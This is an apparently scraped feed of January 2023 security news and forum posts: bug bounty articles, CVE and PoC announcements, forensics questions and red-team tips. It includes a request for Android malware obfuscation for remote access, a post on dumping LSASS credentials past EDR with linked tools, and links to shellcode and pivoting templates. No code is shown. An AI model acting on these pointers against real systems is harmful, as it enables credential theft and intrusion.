and MS Office apps – honestly it is just literally thoroughly integrated in the OS. Please correct me where you see fit as I hate to be paranoid, but at this moment I can’t seem to understand how to safely store / sync files both locally & in the cloud. Thank you submitted by /u/Xhuzestaan [link] [comments]
    does phone number verification on protonmail get passed on to link you to your OSINT results?
    I was wondering if that inevitably gets passed on and subsequently linked to your other accounts in OSINT or other similar resources or if ProtonMail actually follows through when they say, "Your phone number will only be used for this one-time verification." submitted by /u/evanator5600 [link] [comments]
    What Type Of Hypervisor Should I Use For Creating Secure Sandbox Environment?
    Hello everyone, I am interested in setting up a home lab with the goal of creating a secure sandbox environment. I want to use it as a safe platform for learning more about malware analysis, reverse engineering, threat intelligence on the Dark Web. I'm hoping developing these skills will help me land a job with a focus in those general areas. With that in mind, would a Type I or Type II hypervisor provide me the most flexible, secure, and easiest set up? I would imagine a Type I would be easier to set up, but a Type II would be more secure and provide more flexible options. Would having access to a non-virtualized OS provide me any additional benefits in the malware analysis/reverse engineering process? I'd also welcome any general recommendations or security best practices for creating a sandbox to play with malware. Thanks! submitted by /u/matthewob5 [link] [comments]
    Guidelines for secure implementation of third-party software ?
    I am looking into standards/guidelines that can outline the requirements to address secure implementation of a third-party blackbox software apps on an internal server. I know there should be something but can not find anything about it. There is a lot written on sdlc but not so much on off the shelf. submitted by /u/elkindus [link] [comments]
    Does apple not allow windows users to export their iCloud passwords?
    I was trying all day to figure out how to export my icloud passwords to bitwarden with no avail. I have an iPhone & a PC. ​ It would be typical from Apple if there was no way to do this. This is actually exactly why I converted to BitWarden and Google Photos. I can't trust that Apple will give me full control of my data submitted by /u/SteveSonOfJobs [link] [comments]
    Learn Android Malware obfuscation and ways to get Remote access to any android.
    Hi, guys I want to learn about red team stuff related to android hacking, I want to know how to obfuscate the malware for getting the android access, learn android malware obfuscation and are their any other ways to get the Remote access to android other then apk ? I have tried L3mon and TheFATRAT but either the app gets detected or gets uninstalled It would be great if you guys share some useful resource or guide me on getting into the android device. submitted by /u/geeky_gopher [link] [comments]
  • Open

    “Advanced SQL Injection Techniques” How to Bypass Login Forms and Extract Sensitive Data
    SQL Injection is a common method used by hackers to gain unauthorized access to a database and extract sensitive information. One of the… Continue reading on Medium »
    The Top 10 Most Common Vulnerabilities Found in Bug Bounty Programs
    As a bug bounty hunter, it is important to be familiar with the most common vulnerabilities that are found in bug bounty programs. By… Continue reading on Medium »
    Inside the Mind of a Bug Bounty Hunter Interview with a Successful Hacker
    As a bug bounty hunter, the process of finding and reporting vulnerabilities in software can be both challenging and rewarding. To better… Continue reading on Medium »
    How to Effectively Utilize Burp Suite for Bug Bounty Hunting
    Burp Suite is a powerful tool that is widely used by bug bounty hunters to find vulnerabilities in web applications. It is a collection of… Continue reading on Medium »
    Bug Bounty Hunting for Non-Technical Individuals: How to Get Started
    Bug bounty hunting is a process of finding and reporting vulnerabilities in software and receiving a reward for doing so. It has become a… Continue reading on Medium »
    “The Psychology of Bug Bounty Hunting” Understanding the Mindset of Successful Hunters
    Bug bounty hunting is a challenging and rewarding field that requires a unique combination of technical skills and a specific mindset… Continue reading on Medium »
    “Bug Bounty Hunting on the Darkweb” Uncovering Vulnerabilities in Hidden Networks
    Bug bounty hunting on the darkweb can be a challenging and rewarding endeavor for experienced security researchers. Continue reading on Medium »
    “Bug Bounty Hunting as a Career” Opportunities and Growth Potential
    Bug bounty hunting is a rapidly growing field that offers a wide range of career opportunities and growth potential. A bug bounty hunter… Continue reading on Medium »
    “The Art of Chaining” How to Chain Multiple Vulnerabilities for Maximum Impact
    As a bug bounty hunter, one of the most effective ways to find and exploit vulnerabilities is through the art of chaining. Chaining is the… Continue reading on Medium »
    CSRF + Stored XSS to Leading to Full Account Takeover
    This write-up is about my findings of CSRF + XSS and using them both to get a full account takeover. Wish u like it ❤ Continue reading on Medium »
    Privilege Escalation Attacks
    Attacks known as privilege escalation attempt to gain increased access to important systems, applications, and networks by taking… Continue reading on Medium »
  • Open

    Collection of TV remotes
    submitted by /u/themariocrafter [link] [comments]
    OD of academic papers, books on finance & ML (+ some WP assets; English & Korean)
    submitted by /u/1bir [link] [comments]
    French OD of movies
    submitted by /u/Rana_Thisara [link] [comments]
    Windows 93 SkyNet assets (image, midi, js)
    https://pierrepapierciseaux.net/.skynet/img/ - images for Windows 93 SkyNet https://pierrepapierciseaux.net/.skynet/midi/ - ditto for MIDI https://pierrepapierciseaux.net/.skynet/js/ - ditto for JS submitted by /u/themariocrafter [link] [comments]
    More OD’s with old iOS apps, as my first one was a success
    http://www.salixa.com/trh/ios/IPAs/ipa/ http://s1.bitdl.ir/Software/ http://te.censoft.com/download/ https://files.zmodo.com/ http://mikerichardson.name/ https://marcoalima.com/ https://dl.ievo.top https://doc.downloadha.com/Mehran http://schwart6.home.xs4all.nl/smartview2/ submitted by /u/themariocrafter [link] [comments]
  • Open

    Researchers release PoC for iTLB-multihit bug affecting Intel cpus (crashes host from guest in most hypervisors).
    submitted by /u/Ch0pdr0p [link] [comments]
    Somnium: Script to test netsec detection capabilities.
    submitted by /u/Th4ray [link] [comments]
    U-Boot – Unchecked Download Size and Direction in USB DFU (CVE-2022-2347)
    submitted by /u/Gallus [link] [comments]
    libgit2 fails to verify SSH keys by default
    submitted by /u/bascule [link] [comments]
  • Open

    Nest (HTB)
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
    Red Team Series : Introduction to red teaming
    What is red teaming? Continue reading on Medium »
  • Open

    SecWiki News 2023-01-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Uncovering the Digital Trail: An Open-Source Guide to Investigating Social Media Photos
    Social media has become a crucial tool for law enforcement and other investigators in uncovering evidence and solving crimes. Continue reading on Medium »
    So What is a Hacker Anyways?
    A look at black hats, white hats and everything in between. Continue reading on Medium »

  • Open

    The SSL Certificate Issuer Field is a Lie
    submitted by /u/self [link] [comments]
    CVE-2022-25637 - Multiple TOCTOU vulns in peripheral devices (Razer, EVGA, MSI, AMI)
    submitted by /u/jat0369 [link] [comments]
    Abusing Adopted Authority on IBM i
    submitted by /u/buherator [link] [comments]
    Building a io_uring based network scanner in Rust
    submitted by /u/Gallus [link] [comments]
    How to completely own an airline in 3 easy steps
    submitted by /u/_vavkamil_ [link] [comments]
  • Open

    Arbitrarily encoding data in Ping types in a sequence?
    Is a complex and meaningful arrangement of bits ever made into rules and drawn from the size and frequency of pings received? Could it be? I had the thought that one could specify arbitrary rules for using a certain ping size and frequency to represent bits of text or whatever else. example: 30-50bytes= 0 1-200 bytes= 1 or: 5-10 ping per second = 0 1-4 pings per second = 1 Obviously not ideal, but given ping often is easier to send and receive to untrusted devices without configuring things, and sometimes not blocked by firewall IS this ever done? What about messages that are simple, like within network turning on a light. I suppose you would have to have software that automatically translated the data into a long script of different sized and speeded pings to be sent separately in a row and have redundancy for lost packets. submitted by /u/Loquzofaricoalaphar [link] [comments]
    How important is password Authentication - SSH?
    I hear mixed opinions on disallowing password authentication, but my understanding is limited. Is password Auth an additional security measure or a means of establishing ssh without a key-pair exchange? Should ssh password authentication be avoided? I'm familiar with "permitRootLogin no" as being good practice. Thanks in advance! submitted by /u/pLeThOrAx [link] [comments]
    What is Zero-Trust outside of the marketing bs?
    Hi all, searched the sub, have scoured the internet, I believe due to its buzzword use the real meaning has been blown out. From my understanding it means that no one actually has real access to live data and everyone must use an encryption key to access said data. Can someone ELI5? submitted by /u/cfvhbvcv [link] [comments]
    Can authenticated internet-facing web app be discovered if not indexed by search engines?
    Can an internet-facing web app behind an OAuth-redirect login get discovered in the wild if it's not indexed by any search engines? E.g. If something automated is scanning for vulnerabilities can it eventually stumble on said web app amongst millions of random ones? Or can it only be discovered by someone targeting it explicitly e.g. enumerated subdomains of a top-level domain and found something tempting? I would assume the latter. Other possibility is of course someone internal who knows the address. We have such a web app and the WAF picked up a probe for WAF SQL injection vulnerabilities on its custom domain. I'm trying to work out if this is a random scan (don't need to think about it for now) vs getting specifically targeted (do need to think about it more). Thanks! submitted by /u/l00lighters [link] [comments]
    BSIMM Questions
    I'm trying to use the BSIMM but I can't find any document that explains all of the activities in BSIMM? I want a list or a spreadsheet or something that just describes in a single document what the BSIMM framework contains. If you goto the download link on their website, it keeps redirecting me to some report by Synposys? submitted by /u/Soggy_Bag_8745 [link] [comments]
    You Tube vs. Reality
    I've been seeing a lot of cyber security videos claiming that you can get a 6 figure job with no college degree, no experience, no boot camps, no certs, and no problem. They claim specifically for the vulnerable scanner operator, security analyst, and a compliance auditor. I have to say all of this sounds too good to be true. I've been searching online to see the reality(pros and cons) of these positions but fail to find legitimate resources. I want to know what is it like working in these positions day to day pros and cons. submitted by /u/Virtual_Decision9209 [link] [comments]
    How do I customize my Github like this? I am new Github and want a similar look for my repos
    I have been following this researcher for a few weeks and love the look of their profile. Is there an easy way to mimic it? submitted by /u/_billybud_2 [link] [comments]
  • Open

    Sliver C2 Leveraged by Many Threat Actors
    submitted by /u/dmchell [link] [comments]
    Smbmap creates directory to check write privileges on SMB Share
    When using Smbmap in your Red Team engagement, keep in mind, that Smbmap creates a random directory at the root of each SMB Share to check for write privileges, which makes it less stealthy :0 It deletes that directory afterwards (when no exception is thrown). But the Blue Team can still detect it by listening for file creation events at root directory of every share. The name of the directory is by default 10 characters long and consists of only uppercase letters. So this regex should detect it: ^[A-Z]{10}$ ​ Relevant Method -> https://github.com/ShawnDEvans/smbmap/blob/a771476977cee1b96108b3d0122330cd5fe50819/smbmap.py#L779 ​ Random directory name (if you want to patch it) -> https://github.com/ShawnDEvans/smbmap/blob/a771476977cee1b96108b3d0122330cd5fe50819/smbmap.py#L47 ​ ​ https://preview.redd.it/c88sc2nlm9da1.png?width=1008&format=png&auto=webp&s=1c79c52f3ebc0ca3438e643cf5070a4b5187fd79 submitted by /u/JustAnotherRedTeamer [link] [comments]
    Dumping LSASS by CrowdStrike Falcon and Windows Defender
    I was able to dump LSASS with DumpThatLSASS from D1rkMtr successfully with Windows Defender and CrowdStrike Falcon enabled. The EDR tools detect the behavior of the LSASS dump but don't stop the process. This was really interesting behavior for a compiled application. https://youtu.be/3nxjPkxGDWo https://github.com/D1rkMtr/DumpThatLSASS submitted by /u/Infosecsamurai [link] [comments]
    Good UAL (Universal Audit Log) Hunting
    submitted by /u/SCI_Rusher [link] [comments]
    Azure Attack Paths Management
    submitted by /u/sofblocks [link] [comments]
  • Open

    Jump Lists
    Greetings all, I’m attempting to create a timeline of events in a case and had a question regarding jump list files. Is it possible for the OS (Windows 10) to modify Last Accessed date/time of a jump list file without user input? It appears that Windows Explorer accessed a local folder at the following location - “C:\ProgramData[App Name]\…” via jump list and I want to confirm if it was user or OS generated. It should be noted the application appears to be an online-based subscription application. Thanks in advance for you help! submitted by /u/Plastic-Mud-868 [link] [comments]
    Autopsy
    I'm exporting all PDFS and office files from an image. When exporting it adds a number before the original file name, I assume because of duplicate name. When I save the table, the number doesn't appear in the csv. Is there a way to add it to the table? My goal is to create a load file but I'm having trouble matching the original file name. submitted by /u/theedon323 [link] [comments]
    Magnet and Grayshift acquired by private firm, Magnet now a private company
    submitted by /u/copswithguns [link] [comments]
    FTK Imager trying to find evidence of email harvesting
    I am trying to analyse a .E01 file using FTK Imager 4.5.0.3 and am looking for evidence of email harvesting used for spamming unsuspected people to subscribe to illegal IPTV streaming services. I am new to this and have no idea, any help will be appreciated. ​ ​ https://preview.redd.it/a2c4o49868da1.png?width=319&format=png&auto=webp&s=42373e4358d60e820aa2199df45c8a1cfd052f9b submitted by /u/yogiblack590 [link] [comments]
    unique identifiers in word .docx documents?
    Are there any decent UID's in the xml metadata embedded in .docx documents that would tie a document to the installation of word that created it? I can't spot any obvious ones but I dont do this too often. I've used 'creator' before when it was quite specific ('Rupert Q Specialname') - but I've got a bunch of documents that I know were made by the same person - and I need an easy way of spotting future ones also made by the same person. Unfortunately the 'creator' on these ones is just 'john' and that's not specific enough for my needs. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]
    Python Modules in Autopsy
    Hello I am having issues with python modules in Autopsy. Tried a few and non shows up in the ingest menu. I got one to show up but it didn't want to run. Anyone had similar issues and fixed it? All the modules I tried that did not work are only a single .py file. The one that showed up has a few files besides the py file. Got python 2.7 and 3.11 installed. OS is Windows. Autopsy version is 4.19.3 submitted by /u/Iaitoo [link] [comments]
    Criminal Justice Bachelor’s with Digital Forensic Master’s?
    Hey guys! First post here, and I have a quick question. I am currently a 1st year undergrad studying Criminal Justice. My original plan was to go the FBI/DEA/HS route, but recently I’ve started to consider computer forensics careers a lot more. Would it be advisable to finish my CJ degree and get a masters in digital forensics or would it be better to stop my CJ degree and swap to a CS degree if I decide to pursue the DF route? Thanks for any advice! submitted by /u/DuskyBacchus [link] [comments]
  • Open

    Creating your own tools to hunt bugs, a power often neglected
    Creating your own tools based on the needs encountered while hunting bugs is often a power that is overlooked… Continue reading on InfoSec Write-ups »
    Basic SSTI — Server-Side Template Injection | 2023
    Portswigger — Basic server-side template injection Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Bug Zero at a Glance [Week 14 - 20 January]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Two Factor Authentication Bypass On Facebook
    Summary: I discovered the lack of rate-limiting issue in instagram which could have allowed an attacker to bypass two factor… Continue reading on Pentester Nepal »
    Password Cracking Technique used by Blackhat Hackers
    What is Bruteforce? Continue reading on Medium »
    Tryhackme: Easy Peasy
    Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate… Continue reading on Medium »
  • Open

    Buffer Overflow [Vulnserver]
    Buffers are memory storage regions that temporarily hold data while it is being transferred from one location to another. Continue reading on Medium »
    Home Grown Red Team: Bypassing Applocker, UAC and Getting Administrative Persistence
    Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. Continue reading on Medium »
  • Open

    On the Vulnerability of Backdoor Defenses for Federated Learning
    Article URL: https://arxiv.org/abs/2301.08170 Comments URL: https://news.ycombinator.com/item?id=34457721 Points: 1 # Comments: 1
    GitHub introduces CodeQL, a new tool for automated code review and vulnerability
    Article URL: https://github.com/github/codeql Comments URL: https://news.ycombinator.com/item?id=34452685 Points: 4 # Comments: 0
  • Open

    SecWiki News 2023-01-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Tons of old iOS apps
    submitted by /u/themariocrafter [link] [comments]
  • Open

    md5常见问题及绕过
    在CTF中经常碰见md5相关题目,有的是单独一道,更多的是作为其他题目的一个点。这里整理一下md5相关知识,并给出涉及相关点的题目。我见到的有以下类型,请师傅们多加补充1、 md5爆破2、md5弱比较
    DC系列靶机丨DC1
    通过CMS框架漏洞到系统命令提权
    新年活动 | 邀好友赢免单,四重好礼等你领
    FreeBuf知识大陆App新年活动来啦~
  • Open

    Unit 42 Wireshark Quiz, January 2023
    The January 2023 Wireshark quiz analyzes a pcap of network traffic from an Agent Tesla-style infection. The post Unit 42 Wireshark Quiz, January 2023 appeared first on Unit 42.
  • Open

    Efficiently Running Penetration Testing Tools with Github Actions
    Using Github Actions as pentester and to run tools Continue reading on Medium »
  • Open

    Keeping the Wolves Out of WolfSSL — Fuzzing Weekly CW3
    Vulnerabilities in cryptographic libraries found through modern fuzzing… Continue reading on Medium »
    Join the fuzzing community
    Fuzzing is increasingly more common, and exceptionally sophisticated at finding vulnerabilities at scale. Here are two online communities… Continue reading on Medium »
  • Open

    Keeping the Wolves Out of WolfSSL — Fuzzing Weekly CW3
    Vulnerabilities in cryptographic libraries found through modern fuzzing… Continue reading on Medium »
    Join the fuzzing community
    Fuzzing is increasingly more common, and exceptionally sophisticated at finding vulnerabilities at scale. Here are two online communities… Continue reading on Medium »
  • Open

    Keeping the Wolves Out of WolfSSL – Fuzzing Weekly CW3
    Article URL: https://ioc.exchange/@FuzzingWeekly/109720989217652281 Comments URL: https://news.ycombinator.com/item?id=34451019 Points: 1 # Comments: 0
  • Open

    XSS
    XSS Nedir? Continue reading on Medium »

  • Open

    Carbon Black Defense or Microsoft Defender for Endpoints P1/P2?
    Currently in the organization I work for we are utilizing CB Defense and we are considering switching over to MS Defender. Now trying to find actual comparisons of these two/three (P2) products is very difficult since all comparisons are sales related. I want actual real world comparisons and the best I’ve found up to this point is this article. https://carbonblack.vmware.com/resource/vmwares-mitre-engenuity-attck%C2%AE-evaluations-delivers-unmatched-out-box-security-value What are all of your thoughts on P1/P2 in comparison to CB Defense? Please do not tell me about other Endpoint Security solutions. Just looking to get more insight on these. Appreciate any assistance with this decision. submitted by /u/ronni3 [link] [comments]
    A minecraft server wants to take control of PC and install programs.
    https://twitter.com/JohnLzzGrinders/status/1616195715159543810 The tweet includes screenshots of the conversation with the moderator, saying he would have the "child" install a program to control their computer. Discord allows screensharing so it seems malicious these servers keep trying to do it, see my other post for info on the other server that did this same thing. So my question is, even though I pretty much already know the answer, this is not safe to allow right? submitted by /u/Azekial_khyber_gta [link] [comments]
    Are there any GRC / compliance SaaS solutions that are good and fully featured?
    I am looking for something to help with compliance, primarily for SOC 2 but also some other frameworks. I would like it to do automated cross mapping between frameworks for controls/evidence. Also looking for something that has good 3rd party vendor management, risk register, integrations for automated evidence collection and generally just has a good UI/UX. I feel like I have looked at everything out there that might work. Vanta, Drata, Tugboat, Rhapsody, Apptega, StandardFusion, Secureframe, Anecdotes, LogicGate. All of these products seem to be lacking in some way. Mostly around the vendor and risk management. The old school GRC platforms are just too clunky and missing cross-framework mapping and integrations. Is anyone using something that they really like and check all my boxes? submitted by /u/junkaccount1999 [link] [comments]
    Interested in teaching in the industry. Do universities care about bachelors degree GPA?
    I currently work at Meta as a Security Engineer. Because of some circumstances, I got a really low GPA during my bachelors (sub 2.5) but in my masters I did much better and got a 3.8 I mainly got my masters because I want to teach. For those with experiences around the teaching industry, how much will this matter in your opinion? submitted by /u/herbertisthefuture [link] [comments]
    On prem vs cloud SIEM security risks
    Currently in an internal battle with the network and infrastructure guys about the best type of system for our network. They’re of the mind to deploy a SIEM on prem so that, in their minds, we’re protected from the the SIEM itself being breached. Which is their concern with a cloud-based deployment. One of the SIEMs we’d reviewed is perfect but has read/write privileges with O365 for SOAR capabilities. This in their minds is antithetical to the type of system they had going in. Beyond the basics of cost, maintenance, and deployment ease of cloud. Is there any extra ammo you can give me here to build my case? Thanks. submitted by /u/LittleRaskol9 [link] [comments]
    Is there any other interesting fault injection/manipulation attacks like bitsquatting that can be influenced remotely?
    So bitsquatting was a popular fault manipulation technique I'm not gonna use the term fault injection because your not injecting any faults your just manipulating faults already happening to the hardware by crafting the right domains. The fault in this case is thermal residual energy that is known to cause bitflips in memory and in this case it happens during the DNS resolution process. Is there any other interesting attacks like this? Bitsquatting was novel at the time and extremely hard to mitigate the only protection was using ECC ram and even then I don't think error correcting ram mattered. submitted by /u/TheCrazyAcademic [link] [comments]
    Does the Parquet data format have any interesting vulns like injection stuff?
    While layer 7 gets all the attention and popularity of the OSI model a lot of interesting things happen at layer 6 the presentation layer or what I like to call the data format layer. I like to explore various types of exotic over complex data formats because as they say complexity is the enemy of security. The general rule is if a softwares data formatting is too simple like static HTML or JSON it can't be exploited but if it's too complex it can be exploited. Parquet seems to be a complex data format with a lot of moving parts so I'm thinking like CSV theres bugs like a "Parquet Injection' if user input ever gets embedded into a Parquet file on the server backend which I've seen rarely on a few bug hunting engagements but never really messed with Parquet interactions much. submitted by /u/TheCrazyAcademic [link] [comments]
    A searcheable database of the internet's SSL/TLS certificate names.
    CertDB is designed to uncover hidden, forgotten, or abandoned web assets. It can also be used to locate origin servers, detect phishing or fraudulent sites, and even find deleted DNS entries. You can conduct fast searches for keywords, site names, and IP addresses. Try it now and let us know what you think! app.w2s2.com/certdb submitted by /u/One_Opposite_5424 [link] [comments]
    is reading web application hacker's handbook 2 still worth it in 2023?
    i understand that there's also burp academy but there's no way interactive academy can give you knowledege close to what 900 page book can, i glanced over it and there were section about flash and labs that are recomended there are no longer available, i know there's still good information in there and will not skip it but is there something more updated? thanks submitted by /u/WestAd1987 [link] [comments]
    RDP Jumpbox - Worth it?
    As I've eluded to previously, I am preparing to put proper firewall policies in between our workstation and infrastructure networks. One aspect I'm not sure on though, is RDP and SSH access from the workstation network. I've got probably 3 PCs from which Admins will want to get RDP/SSH access. Would a jump box be a good solution, and if so what are some good ways to secure it? My thinking was off the domain and/or MFA to get access. The jump box would only allow RDP from workstation network, no other services. Keen to get some feedback on this one. Thanks! submitted by /u/brettfk [link] [comments]
    Syslog server recommendations?
    We are currently are looking for a syslog server recommendations. We are looking to eliminate single points of failures. We currently use Splunk and encountered and issue where critical logs were lost because the server ran out of space and over wrote them before we could resolve the issue to ingest them. The primary focus is to eliminate single points of failure if our splunk instance encounters issues. Log source: Firewall Web proxy Windows events Sysmon IDS EDR App control Ect…. We currently at looking at the following: Rsylog Kiwi SyslogNG Any other recommendations?? Note: there are several similar post where individuals are recommending SIEMs. We are looking for a syslog server and not a new SIEM solution. submitted by /u/RedNeckHutch [link] [comments]
    Is prototype pollution a bug exclusive to server side JS frameworks?
    People talk about prototype pollution as a powerful vulnerability to get RCE but they never go into detail on the requirements it seems like it's a problem exclusive to things like node js express js etc and it's not a thing outside these environments. submitted by /u/TheCrazyAcademic [link] [comments]
    If I get a password manager will I have to update every single password manually?
    That seems very much like a big hassle. Is it okay if I just update emails & bank accounts? submitted by /u/SteveSonOfJobs [link] [comments]
  • Open

    Cookie exfiltration through XSS on the main search request of www.lahitapiola.fi
    LocalTapiola disclosed a bug submitted by voiddy: https://hackerone.com/reports/1322322 - Bounty: $500
    PURGE is not authenticated
    Yelp disclosed a bug submitted by rac_fckscty: https://hackerone.com/reports/629612
    1 click Account takeover via deeplink in [com.kayak.android]
    KAYAK disclosed a bug submitted by retr02332: https://hackerone.com/reports/1667998 - Bounty: $3000
    Private information exposed through GraphQL search endpoints aggregates
    HackerOne disclosed a bug submitted by reigertje: https://hackerone.com/reports/1838329
  • Open

    CVE-2023-22809: Sudoedit can edit arbitrary files
    Article URL: https://seclists.org/oss-sec/2023/q1/42 Comments URL: https://news.ycombinator.com/item?id=34445602 Points: 55 # Comments: 29
  • Open

    Hacking with cURL: Unleash the CLI beast
    Curl, or client URL is a command line tool that enables data exchange between a device and a server through a terminal. We can use this… Continue reading on Medium »
    Starting my path to bug hunter
    my personal bug bounty to-do items Continue reading on Medium »
    SQL INJECTIONS
    Hii amigos today we are going to discuss about complete overview of SQLinjection and how to find them to earn some good bounties Continue reading on Medium »
    How I was able to hack into anyone’s account on an Institute Portal…
    As I was just messing up with my cousin’s Institute Portal, I noticed its login area and got curious to test its functionalities. Continue reading on Medium »
    Fuzz open source for potential bounties
    Most companies use open source projects. Identifying these components and fuzzing them with free fuzzers can show you vulnerabilities to… Continue reading on Medium »
    The easiest way I used to bypass an admin panel
    In this story I’m explaining a vulnerability that I reported to a program in Hackerone, my english is not perfect and its not my mother… Continue reading on Medium »
    Bug Bounty for Beginners (Part 1): Utilizing OWASP to get into BBPs
    This article will cover the essentials to get started with bug bounty hunting. There are many organizations with a need to have their… Continue reading on Martian Defense Cybersecurity »
    API Misconfiguration - No Swag of SwaggerUI
    Summary Continue reading on Medium »
    Easy XSSHunter Discord Alerts
    This will be a setup guide for XSSHunter and integrating it with Discord Continue reading on Medium »
    A Comprehensive Guide to Writing Effective and Informative Bug Vulnerability Reports
    Bug vulnerability reports are critical for identifying and addressing security issues in software systems. Continue reading on Medium »
    Cross-site WebSocket hijacking
    Portswigger Lab Solution — Cross-site WebSocket hijacking | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
  • Open

    Chapter 1: The Social Station
    The lifes of many people around the globe rely on social stations and on our health care system every day. Continue reading on Medium »
    Wizard Spider
    Wizard Spider is a hacking group known for cyber espionage and targeting government. They have been active since 2017 and based in Russia. Continue reading on Medium »
    Simulating Attacks, Defending Systems, and Enhancing Security: The Role of Red, Blue, and Purple…
    How Organizations Can Stay Ahead of Threats Continue reading on Medium »
  • Open

    Aerleon a vendor agnostic firewall management system
    submitted by /u/ankenyr [link] [comments]
    New Remcos RATversion uses direct syscalls to evade detection.
    submitted by /u/woja111 [link] [comments]
    Simple, open-source, lightweight stress testing tool
    submitted by /u/chrisy_e [link] [comments]
    POC Exploit for CVE-2022-47966 affecting multiple ManageEngine products
    submitted by /u/scopedsecurity [link] [comments]
    SeeProxy: Golang reverse proxy with CobaltStrike malleable profile validation.
    submitted by /u/bambo_gambo [link] [comments]
    Exploiting CVE-2021-3490 for Container Escapes
    submitted by /u/Gallus [link] [comments]
    Centreon Map plugin allows pre-auth remote process memory dump (CVSS 8.3) - PoC
    submitted by /u/qwerty0x41 [link] [comments]
  • Open

    SecWiki News 2023-01-19 Review
    顶会论文写作建议(上):宏观布局,避免“hard to follow” by ourren 从CISA KEV看海量漏洞管理方法 by ourren 基于代码属性图的自动化漏洞挖掘实践 by ourren mqtt攻击面和挖掘思路浅析 by 路人甲 一种 Foxit Reader 漏洞利用思路探索 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-19 Review
    顶会论文写作建议(上):宏观布局,避免“hard to follow” by ourren 从CISA KEV看海量漏洞管理方法 by ourren 基于代码属性图的自动化漏洞挖掘实践 by ourren mqtt攻击面和挖掘思路浅析 by 路人甲 一种 Foxit Reader 漏洞利用思路探索 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Fuzz open source for potential bounties
    Most companies use open source projects. Identifying these components and fuzzing them with free fuzzers can show you vulnerabilities to… Continue reading on Medium »
  • Open

    Fuzz open source for potential bounties
    Most companies use open source projects. Identifying these components and fuzzing them with free fuzzers can show you vulnerabilities to… Continue reading on Medium »
  • Open

    FreeBuf早报 | 乌克兰呼吁建立 “网络联合国”;全国首个数据合规出境案例落地北京
    网信北京消息,首都医科大学附属北京友谊医院与荷兰阿姆斯特丹大学医学中心合作研究项目成为全国首个数据合规出境案例。
    我认识的那些网安行业的销售们
    作为一个产研人,走遍了全国大江南北,和许许多多的销售兄弟姐妹一起并肩作战。
    2022 年全球网络安全漏洞 TOP 10 | FreeBuf 年度盘点
    本文从漏洞披露时间、危害程度、影响范围等多个维度,盘点2022年高危漏洞TOP 10(排名不分先后)。
    丰收之年?去年 GDPR 处罚金额激增至 31 亿美元
    这些金额包括自 2022 年 1 月 28 日以来 27 个欧盟成员国以及冰岛、列支敦士登、挪威和英国开出的所有已知 GDPR 罚款。
    不满韩国与北约合作,亲俄黑客称入侵了三星内部服务器
    亲俄罗斯的黑客组织Genesis Day称,因不满韩国与北约合作而攻破了三星集团的内部服务器。
  • Open

    Hack File Inclusion in DVWA: A Full Walkthrough — StackZero
    No content preview
    Cross-site WebSocket hijacking
    No content preview
    MySQL LOAD_FILE() and INTO OUTFILE() Sql Injection
    No content preview
  • Open

    Hack File Inclusion in DVWA: A Full Walkthrough — StackZero
    No content preview
    Cross-site WebSocket hijacking
    No content preview
    MySQL LOAD_FILE() and INTO OUTFILE() Sql Injection
    No content preview
  • Open

    Hack File Inclusion in DVWA: A Full Walkthrough — StackZero
    No content preview
    Cross-site WebSocket hijacking
    No content preview
    MySQL LOAD_FILE() and INTO OUTFILE() Sql Injection
    No content preview
  • Open

    A template for modern shellcode coding + A socks proxy shellcode for pivoting on IOT
    https://github.com/nobodyisnobody/docs/tree/main/modern.templates.for.shellcoding A convenient template for developing your shellcode on various architecture, x86, arm, mips Permit to run , debug your shellcode , produce an executable, or dump it to include it in your C or python exploit. As an example of usage, here is a Socks4 proxy shellcode (x86, arm, mips, etc...) , to pivot on IOT for example, and gain access to internal network.. https://github.com/nobodyisnobody/docs/tree/main/a.socks.proxy.shellcode ​ any suggestions are welcomed.. submitted by /u/nobodyisnobody13 [link] [comments]

  • Open

    5 basic techniques for automating investigations using the Wayback Machine (archive.org)
    Archive.org is one of the most important sources of information for #osint. From 1996 to 2023, more than 778 billion web pages were saved… Continue reading on Medium »
    Une liste de 20 outils OSINT
    Part 1 Continue reading on Medium »
    How to find more information about a group of dancing dinosaurs spotted on Twitter (a…
    Sometimes you will encounter a photo or video that will need further inspection. You watch the footage endlessly and question yourself how… Continue reading on The First Digit »
    How to find more information about a group of dancing dinosaurs spotted on Twitter (a…
    Sometimes you will encounter a photo or video that will need further inspection. You watch the footage endlessly and question yourself how… Continue reading on Medium »
    Unlock the Power of Telegram Bots for OSINT
    Unlock the power of OSINT with these awesome bots! From data mining to social media monitoring, these bots can help you get the intel you… Continue reading on Medium »
  • Open

    Sudoedit can edit arbitrary files (CVE-2023-22809)
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809 Comments URL: https://news.ycombinator.com/item?id=34434047 Points: 2 # Comments: 0
    Git 2.39.1 (and more) released (CVE-2022-41903, CVE-2022-23521)
    Article URL: https://lwn.net/Articles/920256/ Comments URL: https://news.ycombinator.com/item?id=34423630 Points: 7 # Comments: 0
  • Open

    Brand New
    Hello everybody! Currently have Sec+ and am looking at furthering my education in the field of computer forensics! I’m brand new to this area of computing/security and would like to find out some pointers or the best pathway to get started. Any help would be great, thank you everyone. submitted by /u/Zealousideal_Cry7794 [link] [comments]
  • Open

    Hack File Inclusion in DVWA: A Full Walkthrough — StackZero
    Discover how to exploit file inclusion vulnerabilities using DVWA in this tutorial. Learn everything about these vulnerabilities. Continue reading on InfoSec Write-ups »
    How I identified and reported vulnerabilities in Oracle and the rewards of responsible…
    Hello folks I hope you are doing well. I’m a Parag Bagul security Researcher and bug bounty hunter. Continue reading on Medium »
    Bug Bounty: Writing a Good Bug Report
